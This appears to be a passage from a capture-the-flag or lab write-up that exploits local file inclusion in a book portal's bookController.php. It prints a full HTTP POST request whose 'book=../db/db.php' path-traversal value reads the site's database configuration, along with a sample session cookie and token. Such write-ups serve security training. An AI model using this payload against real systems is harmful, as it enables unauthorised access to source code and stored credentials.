Skip to main content

Exploiting LFI

Upon intercepting the requests with Burp Suite, we see that the website has an interesting request field named method.

Changing the method field from 0 to 1 throws an error message about a missing book field.

error message - missing book field

Exploit Code

Using Burp Suite, we can control the book field, together with the ffuf results, to perform LFI and leak the source code of the book portal as well as the admin portal.

Here, we can read the content of the database config - db.php.

POST /includes/bookController.php HTTP/1.1
Host: 10.10.10.228
Content-Length: 42
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://10.10.10.228
Referer: http://10.10.10.228/php/books.php
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: PHPSESSID=test1e9549a0bf4b172e168a9ca5cbaa6fdb; token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjp7InVzZXJuYW1lIjoidGVzdCJ9fQ.wO1HzPNOz55oU02jJT2wXL7Mvi0JNSB353p6Mgk3o7Y
Connection: close

title=&author=a&book=../db/db.php&method=1

We can thus proceed to read the various source code to see if anything important are revealed.